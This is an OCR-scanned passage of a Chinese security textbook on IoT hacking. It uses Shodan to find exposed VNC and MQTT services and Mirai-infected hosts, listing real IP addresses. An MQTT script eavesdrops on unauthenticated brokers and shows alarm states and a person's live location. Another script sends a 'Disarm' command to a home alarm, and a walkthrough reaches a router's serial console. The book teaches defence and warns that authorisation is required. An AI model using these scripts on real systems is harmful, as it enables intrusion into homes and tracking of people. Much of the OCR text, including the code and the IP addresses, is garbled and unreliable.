Query credits available: 100 
Scan credits available: 100 


最 后 ， 运 行 扫描 以 查找 VNC 服 务 RFB)， 显 示 IP、 端 口 、 组 织 和 主机 名 : 


root@kali:~# shodan search --fields ip str,port,org,hostnames REB > 
results.txt 

root@kali:~# wc -l results.txt 

101 results.txt 

root@kali:~# head results.txt 

117.190.84.102 5901 China Mobile Guangdong 


JoO.9I.LIG.lLlu9 2900 Comcast Cable 
c-76-97-176-189.hsdl1.ga.comcast.net 

91 .2206.11.14 29900 LLC tc Tel Center nodeOl.tcorp.ru 
46.229.234.40 9901 VNET, a.s. 

211.217.104.138 9900 Korea Telecom 

1893.31. 183,151 5900 JSC Internet-Cosmos ipmi.planetahost.ru 
147.47.38.124 5900 Seoul National University 

61.92.62.18 5901 Hong Kong Broadband Network 


061092062018 .ctlInets .com 

180.111.85.166 5900 China Telecom jiangsu 
91.635.157.71 8080 Vodafone Kabel Deutschland 
ip5b419d4d.dynamic.kabel-deutschland.de 


Shodan 命 令 行 工 具 的 一 个 功能 是 可 以 检查 蜜 能 分 数值 ，Shodan 开 及 了 一 种 司 友 
式 方 法 来 测试 一 个 站 点 是 不 是 蜜 铅 ， 并 给 出 蜜 鲍 分 数值 。 

root@kali:~# shodan honeyscore 54.187.148.155 

Not a honeypot 

Score: 0.25 

root@kali:~# shodan honeyscore 52.24.188.77 


Honeypot detected 
Score: 1.0 


22.2.3 Shodan API 


相对 于 使 用 Shodan 数 据 ， 有 piti — 当然 你 也 可 使 用 该 接 
口 。Shodan Python 库 带 有 Shodan 命 令 行 工 具 ， 也 可 使 用 pip 单 独 安装 该 库 。 


222.4 实验 22-2: 测试 Shodan API 


本 实验 将 测试 Shodan API。 你 需要 一 个 API 密 钥 ， 本 实验 中 不 使 用 任何 过 滤 蜗 。 
你 可 使 用 一 个 免费 密 铀 ， 构 建 一 个 Python 脚本 ， 搜 索 提 示人 信息 中 包含 alarm 一 词 的 
MQTT 服 务 。 这 里 的 代码 和 本 间 中 的 其 余 代 码 可 从 本 书 在 线 网 站 和 GitHub 存 储 库 
获取 。 
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root@kali:~# pip install shodan 
Collecting shodan 

Downloading shodan-1.7.5.tar.gz (41kB) 

100: NENNEN 0 1.7/; 

«truncated» 
root@kali:~# cat mqtt-search.py 
import shodan 
import time 
import os 


def shodan search(): 


SHODAN API KEY = "9Gl19LLaQUJCWrlEOFNDGUY-MASKED" 
SEARCH = "mqtt alarm" 
api = shodan.Shodan(SHODAN API KEY) 


Lry: 
results = api.search (SEARCH) 
filel = open("mqtt-results.txt", "w") 
for result in results['matches']: 
searching = result['ip str'] 
filel.write (searching + '\n") 
filel.close() 
except shodan.APIError, e: 
pass 


shodan search () 
root@kali:~# 


接 下 来 运行 MQTT 搜 索 ， 并 观察 结 采 : 


root@kali:~# Python mqtt-search.py 
root@kali:~# wc -1 mqtt-results.txt 
56 mqtt-results.txt 

root@kali:~# head mqtt-results.txt 
141.255.46.14 

42.120.17.118 

118-124: 20U.9 

2171.53.20. 5] 

120.113.65.51 

Ve es ee 495.249 

151.27.103.165 

58.42.224.105 

2 90.129 29 

TI.69.1H.229U 

root@kali:~# 
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222.5 实验 22-3: 使 用 MQTT 


在 上 一 个 实验 中 ， 在 Shodan 中 用 字符 串 “mqtt alarmn ”进行 搜 索 ， 以 识别 运行 
MQTT( 包 含 alarm 一 词 ) 的 IP 地 址 。 本 实验 在 一 个 结果 IP 列 表 中 搜索 特定 信息 。 以 下 
代码 摘自 Victor Pasknel 的 示例 。 


root@kali:~# pip install paho-mqtt 

Collecting paho-mqtt 
Downloading paho-mqtt-1.3.1.tar.gz (80kB) 

人 

Building wheels for collected packages: paho-mqtt 
Running setup.py bdist wheel for paho-mqtt ... done 
Stored in directory: 

/root/.cache/pip/wheels/20/d8/0d/acdc8£f2890111b7be7de71deebef064 

fb83be0313dfff0493 

Successfully built paho-mqtt 

Installing collected packages: paho-mqtt 

Successfully installed paho-mqtt-1.3.1 

root@kali:~# cat mqtt-scan.py 

import paho.mqtt.client as mqtt 


Qa3-* on connect(client, userdata, flags, rc): 
print "[+] Connection successful" 
client.subscribe('#', qos = 1) # Subscribes to all topics 


名 def on message (client, userdata, msg): 
print '[+] Topic: $s - Message: %s' $ (msg.topic, msg.payload) 


&client = matt.Client(client id = "MqttClient™") 
@client.on connect — on connect 
Oclient.on message — on message 


Qciient.connect ("IP GOES HERE - MASKED', 1883, 30) 
@client.loop forever () 


这 个 Python 程序 很 简单 : 加 载 mqtt.client 库 后 , 程序 为 初始 连接 定义 调用 @@( 给 出 
连接 消 轧 ， 并 订阅 服务 左上 的 所 有 主题 )， 在 收 到 消 轧 时 定义 调用 扣 ( 和 输出 消 筷 )。 接 
下 来 初始 化 客户 闹 合 ， 注 册 回 调 @@。 最 后 ， 连 接 到 客户 新 @( 务 必 更 改 这 一 行 上 的 
HB), FURR MUO. 


注意 : IRR, ix WDR SAX e. 


接 下 来 运行 MQTT 扫 描 器 : 


root@kali:~# Python mqtt-scan.py 

[+] Connection successful 

[+] Topic: /garage/door/ - Message: On 

[+] Topic: owntracks/CHANGED/bartsimpson - Message: 
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["_type":"location"; "tid" :"CHANGED"; "ace" :Dr bat.” 100, "Conn" "m", 
"lat":-47.CHANGEDO0O, "lon": -31.CHANGEDOO, "LSUC": CHANGED," cp":truej 
[+] Topic: home/alarm/select - Message: Disarm 

[+] Topic: home/alarm/state - Message: disarmed 

[+] Topic: owntracks/CHANGED/bartsimpson - Message: 

I" type” s"locdgblion"," tid": GHANGED"',"Scc":O, BDatb":1D0,"conn":"m", 
"lat":-47.CHANGEDO1,"lon":-31.CHANGEDOT1, "tSt": MASKED," cp":truej 
[+] Topic: owntracks/CHANGED/bartsimpson - Message: 

i" type":"location", "Eid" = "CHANGED", "acc":5, "batt":100, "conn" : "m", 
"lat":-47.CHANGEDO2,"lon":-31.CHANGEDO2, "LSt" : MASKED," cp":true} 
[+] Topic: owntracks/CHANGED/bartsimpson - Message: 

I" type":"locatiton"," tid": "CHANGED", "acc":5,"batt":100, "conn": "m", 
"lat":-47.CHANGED-3,"lon":-31.CHANGEDO3, "LSt" : MASKED," cp^":truej 


接 下 来 将 分 析 输出 
22.26 未 经 身份 认证 访问 MQTT 带 来 的 启示 


令 人 惊奇 的 是 ，MQTT 扫 拉 右 的 输出 ， 不 仅 显 示 了 家 里 的 爸 报 信息 (Disarmed)， 
Xe zm S FERS. A 通过 运行 用 户 手机 上 神奇 的 OwnTracks 应 用 程序 ， 得 知 
主人 不 在 家 而 外 出 。 这 有 是 因为 每 过 几 秒 ， 束 会 提供 新 的 LAILONG 数 据 。 它 就 像 一 
MEHA, 告诉 你 主人 待 在 家 里 和 外 出 的 时 间 。 XEIRA S! 好 像 也 没 
什么 ， 但 一 些 家 用 目 动 管理 系统 不 仅 允 许 恋 取 信息 ， 还 允许 与 入 信息 。 通 过 发 布 命 
令 ( 而 非 订 阅 ) 来 完成 写 入 ， 因 此 ， 可 进行 发 布 。 例 如 ， 可 给 一 个 伪造 系统 发 送 一 条 
盆 造 命令 (本 例 中 的 系统 并 不 存在 ， 是 虚拟 的 )。 


u/ FR: 要 发 出 命令 ， 并 更 改 不 属于 自己 的 系统 的 配置 ， 就 可 能 超越 道德 底 
Mess 线 ， 也 可 能 触犯 法 律 ; 只 有 在 获得 授权 后 才能 尝试 对 系统 进行 测试 。 特 此 
| 


下 面 是 一 个 虚构 的 系统 示例 ( 仅 用 于 演示 )， 同 样 改 编目 Victor Pasknel 提 供 的 示例 。 


root@kali:~# cat mqtt-alarm.py 
import paho.mqtt.client as mqtt 


def on connect(client, userdata, flags, rc): 
print "[+] Connection success" 
client.publish('home/alarm/set', "Disarm") 


client = mgtt-Client (client id = "MgrEtClIxent") 


client.on connect = on connect 
client.connect('IP GOES HERE', 1883, 30) 
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22.3 loT#eh: 只 是 时 间 问 题 


Internet 记 者 Brian Krebs 写 过 多 篇 揭露 黑客 的 文章 ， 这 引发 攻击 者 对 他 的 敌意 ; 
在 2016 年 年 底 ， 攻 击 者 通过 大 规模 分 布 式 拒绝 服 务 攻 击 (Distributed Denial-of-Service， 
DDoS) 对 Brian Krebs 发 动 离 线 攻 击 , 使 其 网 站 下 线 。 现 在 , DDoS 攻击 已 经 不 再 罕见 ， 
但 新 意 在 于 攻击 所 用 的 方法 。 一 批 存在 漏洞 的 物 联 网 设备 ( 即 摄像 机 ) 参 与 了 进攻 ， 
这 在 历史 上 沿 属 首次 。 另 外 ，DDoS 攻 击 通 常 属于 反射 式 攻击 类 型 ， 攻 击 者 通过 利 
用 霖 些 协 议 放大 攻击 (只 需要 一 个 简单 的 命令 请 求 ， 但 具有 大 量 啊 应 )。 这 次 根本 不 
是 反射 式 攻 击 ， 而 是 来 目 无 数 有 党 感染 主机 的 普通 请 求 ， 生 成 的 流量 达到 665 Gbps, 
在 以 前 记录 的 基础 上 翻 了 一 番 。 攻 击 的 发 送 并 是 与 互联 网 连接 的 摄像 机 。 攻 击 者 已 
经 发 现 ， 这 些 摄像 机 使 用 了 默认 密码 。 该 晴 虫 又 名 Mirai( 源 于 2011 年 的 一 部 电视 剧 )。 
攻击 者 通过 使 用 来 自 不 同 供应 商 的 、 由 60 多 个 默认 密码 组 成 的 密码 表 登 录 到 基于 互 
联网 的 摄像 机 。Mirai 蠕 虫 小 心地 绕 过 美国 邮政 局 和 国防 部 的 人 P 地 址 ， 但 其 他 IP 地 址 
都 在 攻击 范围 内 。 托 过 Krebs 网 站 服务 的 提供 商 Akamai 原 本 因为 能 抗击 DDoS 攻击 而 
闻名 ， 但 这 次 却 无 法 抵御 攻击 。 经 过 痛 舌 的 讨论 后 ，Akamai 雇 定 放 工 给 Krebs 提 供 
服务 。Mirai 肾 虫 也 攻击 其 他 人 ， 成 为 当时 最 内 名 昭 痢 的 网 络 蠕虫 ， 引 起 全 世界 的 三 
泛 关 注 。 后 来 ， 受 到 Mirai 感 染 的 主机 家 用 于 攻击 路 由 需 中 的 其 他 漏洞 ， 进 一 步 扩大 
了 威胁 范围 。 最 终 ， 抄 匀 者 参与 进来 ， 很 多 Mirai 变 体 不 断 涌现 出 来 。 在 源 代码 发 布 
后 ， 受 感染 的 主机 数量 接近 翻番 ， 达 到 493 000 台 之 多 。 

在 撰写 本 书 时 ， 攻 击 者 已 开始 越 来 越 多 地 将 物 联网 设备 作为 目标 。 攻 击 者 不 再 
检查 默认 密码 ; IoT Reaper 蚂 虫 使 数 白 万 台 在 线 摄像 机 变 得 易 受 攻击 。 有 一 件 事 情 是 


确定 的 ， 如 本 章 所 述 ， 物 联网 设备 无 处 藏身 。 如 果 将 它们 连接 到 互联 网 ， 就 可 以 设 
法 找到 它们 。 


22341 实验 22-4: Mirai 依 然 存 在 


与 Mirai 之 间 的 战争 已 超过 一 年 , 但 网 络 中 仍然 存在 很 多 受 其 感染 的 主机 。 我 们 
可 以 使 用 Shodan 搜 索 那 些 受 到 Mirai 感 染 的 主机 .: 


root@kali:~# shodan search --fields ip str,port,org,hostnames 
category:mirai > results2.txt 

root@kali:~# head results2.txt 

61.138.130.130 23 Integra Telecom 


177.23.74.135 21 Provedor de Servi?os de Internet Ltda 
177-23-74-135.interminas.com.br 

61.136.194.9 23 Integra Telecom 

173.49.87.180 443 Verizon Fios 


pool-173-49-87-180.phlapa.fios.verizon.net 
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LU 089 23 Earthlink — Stdbic-L73-210-32—- 
165.ngn.onecommunications.net 
ix Bos M rn eee = 23 EarthLink static-63-131-121- 
233.mil.onecommunications.net 


6/7.51.126.114 23 Integra Telecom 
1099:113-130 25 Integra Telecom 
12.248.24.48 23 EarthLink 


static-72-248-24-48.ct.onecommunications.net 
173.210.124. 67 23 EarthLink static-173-210-124- 
67.ngn.onecommunications.net 


22.3.2 ”预防 措施 


你 已 经 看 到 不 经 过 号 份 认证 连接 到 互联 网 的 开放 系统 所 面临 的 威胁 ， 下 面 将 给 
出 一 些 实用 建议 : 对 目 己 发 动 攻击 ! 严肃 地 讲 ，Shodan 有 很 多 人 免费 搜索 服务 可 供 利 
用 ， 为 什么 不 抢 在 他 人 之 前 使 用 呢 ? 使 用 www.whatismyip.com 或 类 似 服务 搜索 目 己 
家 庭 成 员 、 企 业 或 认识 的 任何 人 的 地址。 另 一 个 有 价值 的 资源 是 BullGuard 的 物 联 
WX nternet of Things Scanner， 请 参阅 “扩展 阅读 ”)， 它 允许 你 对 自家 进行 扫 
描 ， 看 一 下 目 家 是 否 在 Shodan 搜 索 范 围 内 。 


224 本章 小 结 


本 章 讨论 越 来 越 多 连接 到 互联 网 的 设备 ， 这 些 设备 构成 了 物 联 网 。 本 章 讨论 这 
些 设 备 使 用 的 网 络 协议 ， 接 着 分 析 了 专门 搜索 物 联网 设备 的 Shodan 搜 索引 擎 。 最 后 
讨论 了 一 件 必然 发 生 的 事情 : 物 联网 蠕虫 的 到 来 。 读 完 本 章 后 ， 灰 帽 黑客 可 以 更 好 
地 识别 和 阻止 威胁 ， 保 护 好 自己 ， 也 保护 好 亲友 和 客户 。 


tB 2339 BARAT 


AN a fia] BEST ZARA SUI, FIIUBORCRGS. ER I fx — IEAM. Hk 
AD ET EE m 4e Spe DU BRO BEY BARIERA. HUN X e IES 
AS. MRR HACA PRL. EPEAT a8. PRET. APE Ao FR 
iT. WORE KEE AN TEE ST TE, (Et A ere SIL a FEE 
们 生活 的 机 会 。 

本 章 的 大 部 分 讨论 都 围绕 着 集成 电路 (Integrated Circuit，IC)。IC 是 处 于 小 型 封 
装 内 的 电子 元 件 的 集合 , 通常 称 为 “芯片 ”. 一 个 简单 示例 是 4 路 2 输入 或 门 IC, 其 中 ， 
4 路 2 输入 或 门 电路 是 在 单个 芯片 上 实现 的 。 在 我 们 的 例子 中 ，IC 将 更 复杂 ， 在 单个 
IC 中 包含 完整 的 多 个 计算 单元 。 另 外 请 注意 ， 本 章 假设 你 熟悉 万 用 表 以 及 电子 电路 
的 基本 概念 ， 如 电压 、 电 流 、 电 阻 和 接地 等 。 


本 章 沽 震 的 主题 如 下 : 
e CPUC HAH aS) 
e RITH 

e 调试 接口 

e 软件 


23.1 CPU 


GREER) AVE NR RSA, ERATURE ARRAS. HT 
mi RA SARE. TRAE. REAREA ISDN BA IR], (Ae Ph AS TRIS At 
理 器 架构 。 由 于 嵌入 式 系统 通常 具有 更 明确 的 功能 要 求 ， 因 此 倾向 于 更 加 量化 性 能 
需求 。 通 过 绽 合 考虑 软件 和 便 件 要 求 ， 确 定 适 当 的 微 处 理 需 、 微 控制 项 或 请 上 系 红 
(System on Chip, SoC). 


23.1.1 fX A THER 


TALES Hes Fr A BAN ELT PI TF SCE Ef ne. di T Ah Has B EVE n] 8 HX 
*AMEM RBS. nDefrLinuxSEEZRTRTRARAR. Uh WLÜUPCE XE — TE T DX BE ae 
设计 的 设备 示例 。 
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23.1.2 MeHg 


微 控制 器 在 嵌入 式 领域 十 分 常见 。 微 控制 器 通常 在 单个 芯片 中 包含 CPU 内 核 
内 存 、 存 储 器 和 LO 端口 。 微 控制 器 完美 契合 的 高 度 区 入 式 设计 ， 适 用 于 执行 简单 应 
用 或 定义 明确 的 低 性 能 应 用 。 由 于 应 用 程序 和 硬件 十 分 简单 ， 微 控制 器 上 的 软件 通 
常 使 用 较 低级 语言 (如 汇编 语言 或 C 语 言 ) 编 号， 并 且 不 包括 操作 系统 (OS)。 微 控制 器 
的 应 用 领域 包括 电子 门 锁 与 电视 遥控 器 。 

为 确保 应 用 安全 ， 保 护 功能 可 在 硬件 中 实现 ， 具 体 实现 方式 取决 于 特定 的 微 控 
制 器 。 例 如 ， 对 程序 存储 进行 读 保护 ， 阻 止 激活 芯片 调试 接口 。 虽 然 这 些 保护 功能 
提供 了 一 层 保护 ， 但 不 能 杜绝 保护 被 绕 过 的 情形 。 


23.1.3 SoC 


SoCzé —^ Bl e ^ po Rb EE ss VAT Sell as» TERE -NIC_E A AKER HY EE 
功能 。 例 如 , 用 于 电话 的 SoC 可 能 包含 图 形 处 理 单 元 (Graphics Processing Unit, GPU), 
音频 处 理 器 、 内 存 管理 单元 (Memory Management Unit, MMU), #5 FUP 28 43 ill 48 o 
由 于 心 片 较 少 ， 应 用 规模 小 ，SoC 的 主要 优势 是 降低 了 成 本 ， 更 多 是 以 目 定 义 方式 
使 用 。 微 控制 右 在 内 部 存储 程序 ， 但 因为 提供 的 内 存 十 分 有 限 ， 因 此 通 弟 会 使 用 外 


23.1.4” 弟 见 的 处 理 兹 架构 


存在 多 种 微 控制 疾 架 构 ， 如 Intel 8051. Freescale (Motorola) 68HC11 和 Microchip 
PIC， 但 与 互联 网 连接 的 设备 更 多 使 用 两 种 架构 : ARM 和 MIPS。 在 使 用 反 汇 编 右 、 
构建 工具 和 调试 右 等 工具 时 ， 了 解 处 理 帮 架 构 十 分 草 要 。 通 第 可 检测 电路 板 并 找到 
处 理 髓 ， 从 而 可 以 确定 使 用 的 处 理 妖 染 构 。 

ARM 是 一 种 授权 使 用 的 架构 ， 很 多 微 处 理 器 、 微 控制 器 和 SoC 制 造 商 (如 Texas 
Instruments、Apple 和 Samsung 等 ) 部 使 用 这 种 染 构 。 根 据 应 用 方式 的 不同, ARM 内 核 
提供 多 种 授权 组 合 方 式 。ARM 内 核 具 有 32 位 和 64 位 架构 ， 可 配置 为 高 位 优先 字 节 序 
(Big-Endian) 或 低位 优先 字 市 序 (Little-Endian) 模 式 。 表 23-1 展 示 了 通 弟 的 授权 组 合 方式 
和 应 用 领域 。 

MIPS 现 由 Tallwood MIPS 公 司 所 有 ， 多 家 制造 商 (如 Broadcom 和 Cavium 等 ) 已 获 
得 授权 。 与 ARM 类 似 ，MIPS 具 有 32 位 和 64 位 架构 ， 可 配置 为 高 位 优先 字 节 序 或 低 
位 优先 字 市 序 模式 。 它 党 用 于 网 络 设备 ， 如 无 线 接 入 点 和 小 型 家 用 路 由 右 。 


第 23 章 ”剖析 内 入 式 设 备 


表 23-1 ARM 授权 组 合 


授权 组 合 示例 应 用 


应 用 最 强大 的 授权 组 合 。 它 的 突出 功能 是 MMU， 人 允 | 手机 、 平 板 电脑 和 机 项 盒 
许 运行 功能 丰 品 的 操作 系统 , 如 Linux 和 Android 
实时 适用 于 需要 实时 性 能 的 应 用 。 特 点 古 低 中 断 延 | 网 络 路 由 右 和 和 交换机、 摄像 


迟 和 内 存 保护 ， 它 不 包含 MMU 机 和 汽车 
微 控制 器 | 适用 于 规模 小 、 性 能 要 求 低 的 高 度 嵌 入 式 系统 。| 工业 控制 、 可 编程 灯 
特点 是 低 中 断 延迟 、 内 存 保护 和 嵌入 式 内 存 


232 ”品行 接口 


串 行 接口 在 与 对 方 明 信 时 ， 按 串 行 方式 ， 在 通信 信 韦 中， 一 次 传输 一 位 。 由 于 一 
次 只 传输 一 位 ，IC 上 需要 的 引 脚 较 少 。 相 对 而 言 ， 并 行 接口 通信 一 次 传输 多 位 ， 因 此 
需要 的 引 脚 较 多 (每 一 位 需要 一 个 引 脚 )。 在 众 入 式 系统 中 可 以 使 用 多 种 串 行 协议 ， 但 
这 里 仅 讨 论 通 用 异步 收 友 需 (Universal Asynchronous Receiver-Transmitter, UART), 4T 
外 设 接口 (Serial Peripheral mterface，SPD 和 内 部 集成 电路 (nter-Integrated-Circuit，EC) 
协议 。 


23.2.1 UART 


UART HW f VE PA & eee TEES (ORI PF 1T 7J 8088 o UART HT Xe pe Silo 
制 合 ， 使 得 人 员 可 与 设备 区 互 。 虽 然 大 多 数 说 备 不 具有 用 于 串 行 通信 的 外 部 接口 ， 
但 很 多 都 有 开发 和 测试 设备 时 使 用 的 内 部 接口 。 在 测试 设备 时 ， 通 过 内 部 可 访问 的 
串 行 接口 可 以 看 到 要 求 验证 身份 和 不 要 求 验证 身份 的 控制 台 。 

UART 需 要 三 个 通信 引 脚 ， 通 常 配 备 一 组 四 个 引 脚 ( 见 图 23-1D)。 你 可 能 在 电路 板 
上 看 到 了 标签 ， 但 这 些 焊 检 或 引 脚 头 通 党 不 加 标签 ， 需 要 目 行 识别 。 虽 然 图 23-1 是 
一 个 不 错 的 示例 ， 作 为 串 行 通信 接口 的 引 脚 头 十 分 显眼 ， 但 引 脚 的 布局 未 必 总 是 这 
么 清晰 直观 ， 而 可 能 与 更 多 引 脚 混 杀 在 一 起 。 

找到 并 连接 内 部 串口 的 主要 原因 是 为 了 答 试 找到 未 计划 给 系统 用 户 访问 的 信 
时。 例如 ，Web 接 口 通 党 不 允许 直接 访问 文件 系统 ， 但 Linux 系 统 上 的 串 行 控 制 台 允 
TFA PUI CEA St. WRB BERET A AE, BOAR TI a, Bik 
更 改 引 导 进 程 ( 可 使 用 JTAG 调 试 端 口 ) 以 绕 过 身份 认证 。 
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123-1 Ubiquiti ER-X 上 的 四 个 串 行 端口 未 加 标签 


要 发 现 串 行 焊 盘 ， 可 使 用 由 Joe Grand 开发 的 JITAGulator 等 工具 暴力 破解 信号 ， 
得 到 焊 盘 布局 和 波 特 率 。 下 面 针 对 图 23-1 中 显示 的 Ubiquiti ER-X 运 行 UART 识 别 测 
试 ， 使 用 JTAGulator 识 别 带 标签 的 引 肢 。 步 又 如 下 : 

(1) 通过 检测 电路 板 找到 认为 是 UART 的 焊 盘 或 引 脚 头 。 如 采 看 到 2~4 个 焊 盘 或 
引 脚 头 在 电路 板 上 组 合 在 一 起 ， 这 将 是 不 错 的 迹象 ， 但 如 前 所 述 ， 这 些 引 脚 头 可 能 
与 其 他 焊 盘 或 引 脚 头 混 杂 在 一 起 。 

(2) 使 用 万 用 表 对 电路 板 进行 测量 ， 或 识别 IC 并 奏 找 数据 表 ， 确 定 目 标 电压 。 

(3) 测量 已 知 接地 (如 机 过 接地 ) 和 易于 连接 的 引 脚 间 电 阻 值 , 通过 确认 接地 和 引 
脚 间 电阻 是 0 欧姆 ， 发 现 便于 连接 的 接地 引 脚 。 

(4) 如 果 羊 运 地 找到 了 引 脚 头 ， 束 将 电路 板 连接 到 JTAGulator， 或 将 引 脚 头 焊 接 
到 电路 板 上 ， 然 后 连接 ， 如 图 23-2 所 示 。 


图 23-2 SN ER-X 之 间 的 连接 
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(5) 验证 JIAGulator 固件 的 版 本 人 @。 可 对 照 存储 库 中 的 代码 (位 于 
https://github.com/grandideastudio/jtaegulator/releases) 检 查 版 本 。 如 果 有 版 本 不 是 最 新 的 ， 
则 按 www.youtube.comywatch2v=xLXwy-weG1M 上 的 说 明 操 作 。 

(6) 局 用 UART 模 式 @ 并 设置 目标 电压 @ . 

(7) 运行 UART 识 别 测试 @ . 

(8) 成 功 后 ， 但 找 预 期 的 啊 应 ， 如 回 车 或 回 行 @(0D 或 0A)。 

(9) 在 pass-thru 模 式 售 下 运行 ， 验 证 识别 的 设置 。 此 处 ， 波 特 率 为 57 600@ . 


< . Omitted ASCII ART ...> 
Welcome to JTAGulator. Press 'H' for available commands. 
Warning: Use of this tool may affect target system behavior! 


> i 

Target Interfaces: 

J JTAG/IEEE 1149.1 

U | UART/Asynchronous Serial 
G GPIO 


General Commands: 

V Set target I/O voltage (1.2V to 3.3V) 
I Display version information 

H Display available commands 


O> i 
JTAGulator FW 1.4 
Designed by Joe Grand, Grand Idea Studio, Inc. 


Main: jtagulator.com 

Source: github.com/grandideastudio/jtagulator 

Support: www.parallax.com/support 

@> u 

@UART> v 

Current target I/O voltage: Undefined 

Enter new target I/O voltage (1.2 - 3.3, 0 for off): 3.3 
New target I/O voltage set: 3.3 

Ensure VADJ is NOT connected to target! 


QUART> u 

UART pin naming is from the target's perspective. 

Enter text string to output (prefix with Xx for hex) [CR]: 
Enter starting channel [0]: 

Enter ending channel [1]: 

Possible permutations: 2 

Press spacebar to begin (any other key to abort)... 
JTAGulating! Press any key to abort... 

<.. Omitted lower baud rates .> 

TXD: 1 
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RXD: O 

Baud: 9600 

Data: '.].!Hv.Sk...... [ 60 FC 5D 84 21 48 76 AF 53 6B 1A 92 OA EF FF 1F | 
TXD: 1 

RXD: O 

Baud: 14400 

Data: {..../Btf{.*J.Z. [ 7B 09 DE 8A DA 2F 42 2B 66 7B DB 2A 4A 99 5A 10 ] 
TXD: 1 

RXD: O 


Baud: 19200 
Data: T..W...*.q..Q... [ 54 81 Co 5/ B9 19 CE 2A 9A 7/1 EE OO 51 18 EA 19 | 


TXD: 1 

RXD: 0 

Baud: 28800 

Data: ::..[H..q.lol.L. [ 9D 08 E2 DA 5B 48 88 UC 67 F2 29 6F 31 ID AC DC | 
TXD: 1 

RXD: O0 

Baud: 31250 

Data: celles . o2 | FA O24 3B 2B B9 74 JE 95 30 224 US oF 20 B2 DE 7A | 
TXD: 1 

RXD: 0 


Baud: 38400 
Data: ..9 3SdWV./...hO0 [ F9 FC 39 20 33 53 64 57 56 05 2F 8D BD B7 68 30 ] 


TXD: 1 

RXD: 0 

Baud: 57600 

加 Data: .. [ OD 0A ] 
TXD: 1 

RXD: 0 

Baud: 76800 

Data: . [ OC ] 

TXD: 1 

RXD: O0 

Baud: 115200 

Data: . [ F8 | 

<.. Omitted Higher Baud Rates ..» 
QuaRT» p 


UART pin naming is from the target's perspective. 
Enter X to disable either pin, if desired. 

Enter TXD pin [1]: 

Enter RXD pin [0]: 

@eEnter baud rate [0]: 57600 
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Enable local echo? [y/N]: y 
Entering UART passthrough! Press Ctrl-X to abort... 


Welcome to EdgeOS ubnt ttysS1 


By logging in, accessing, or using the Ubiquiti product, you 
acknowledge that you have read and understood the Ubiquiti 
License Agreement (available in the Web UI at, by default, 
http://192.168.1.1) and agree to be bound by its terms. 


如 采 测 斌 成功 ， 现 在 残 可 与 串 行 控制 台 进 行 交 互 了 了。 使 用 已 连接 的 串 行 控制 台 
重 置 设 备 是 典型 做 法 。 由 于 篇 幅 所 限 ， 无 法 在 这 里 列 出 全 部 文本 ， 只 提供 引导 消息 
的 片段 。 

e Abts 7eMT-7621A(MIPS): 

ASIC MT7621A DualCore (MAC to MT/530 Mode) 


e HiT U-BootH Jr: 


Please choose the operation: 

: Load system code to SDRAM via TFTP. 

: Load system code then write to Flash via TFTP. 

Boot system code via Flash (default). 

Entr boot command line interface. 

Load Boot Loader code then write to Flash via Serial. 
9: Load Boot Loader code then write to Flash via TFTP. 

default: 3 


中 ~] e WN HB 


e 下 在 运行 Linux 版 本 3.10.14-UBNT: 


Linux version 3.10.14-UBNT (root@edgeos-builder2) (gcc version 4.6.3 
(Buildroot 2012.11.1) ) #1 SMP Mon Nov 2 16:45:25 PST 2015 


e MTD 分 区 有 助 于 理解 存储 布局 : 


Creating 7 MTD partitions on "MT7621-NAND": 
0x000000000000-0x00000ff80000 : "ALL" 
0x000000000000-0x000000080000 : "Bootloader" 
0x000000080000-0x0000000e0000 : "Config" 
0x000000060000-0x000000140000 : "eeprom" 
0x000000140000-0x000000440000 : "Kernel" 
0x000000440000-0x000000740000 : "Kernel2" 
0x000000740000-0x00000ff00000 : "RootrFS" 
[ntk nand] probe successfully! 


确定 布局 后 ， 可 使 用 Bus Pirate 等 工具 连接 到 焊 盘 ， 与 散 入 式 系 统 通 信 。 务 必 记 
住 将 设备 上 的 TX 连接 到 Bus Pirate 上 的 RX, 将 设备 上 的 RX 连接 到 Bus Pirate 上 的 TX。 
与 JIAG 接 口 一 样 ， 有 些 人 低估 了 在 设备 上 局 用 串口 的 严重 性 。 然 而 ， 通 过 访问 
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控制 台 ， 攻 击 者 可 提取 配置 信息 和 二 进 制 代码 ， 可 安放 工具 ， 并 探查 秘密 ， 以 便 对 
这 种 类 型 的 所 有 人 设备 友 起 远程 攻击 。 


23.22 SPI 


SPIE -TEALA SRO, FERRARA TUI. SUARTA^[W, SPIČ 
FENDRE Pi ZB. SERTEN, HIT BONG RERPICIRIBDE S. VE 
协议 使 用 主 /从 架构 ， 文 持 多 个 从 设备 。 最 简单 形式 的 SPI 需 要 四 个 引 脚 进行 通信 ， 
引 脚 在 焊 盘 上 (参考 UART 示 例 ), 但 通信 速度 更 快 (以 缩短 距离 为 代价 )。 有 必要 指出 ， 
SPI 个 是 标准 协议 ， 需 要 但 阅 数 据 表 以 确定 此 类 设备 的 确切 行为 。 四 个 引 脚 如 下 。 
e SCK(Serial Clock， 串 行 时 钟 )。 

e MOSI(Master Out Slave In， 主 出 从 入 )。 

e MISO(Master In Slave Out, EAMH). 

e SS(Slave Select， 从 设备 选择 ) 或 CS(Chip Select, wM: 从 主 设 备 输出 
到 从 设备 ， 低 电 平 有 效 。 

对 于 有 具有 一 些 从 设备 的 系统 而 言 ， 主 设备 通 单 使 用 专用 的 CS 确定 每 个 从 设备 的 

兽 加 了 CS， 需 要 更 多 引 脚 / 走 线 ， 进 而 增加 了 系统 成 本 。 例 如 ， 采 用 这 

种 配置 时 ， 对 于 具有 三 个 从 设备 的 系统 而 言 ， 微 控制 占 上 需要 6 个 引 脚 ( 见 图 23-3)。 

对 于 具有 多 个 从 设备 的 情形 ， 另 一 个 曾 见 配置 是 菊花 链 (daisy chain)， 如 图 23-4 
所 示 ， 通 常 在 主 设备 不 需要 接收 应 用 (如 LED) 的 数据 或 有 多 个 从 设备 时 使 用 。 将 芯 
片 1 的 输出 连接 到 心 片 2 的 输入 ， 以 此 类 推 ， 延 迟 时 间 与 主 设备 和 预期 接收 者 之 间 的 
心 片 数量 成 正比 。 


SCK sek SPI 
MOSI - M Most 从 设备 1 


图 23-3 ”三 芯片 配 置 中 的 SPI， 使 用 独立 的 CS 图 23-4 ”使 用 菊花 链 的 SPI 三 心 记 配置 


SPI 协 议 的 一 种 常见 用 途 是 访问 EEPROM 和 闪存 器 件 。 通 过 使 用 Bus Pirate 和 
flashrom( 或 类 似 技 术 )， 将 能 提取 EEPROM 和 闪存 中 的 内 容 。 此 后 可 分 析 内 容 ， 找 到 
文件 系统 并 探查 秘密 。 
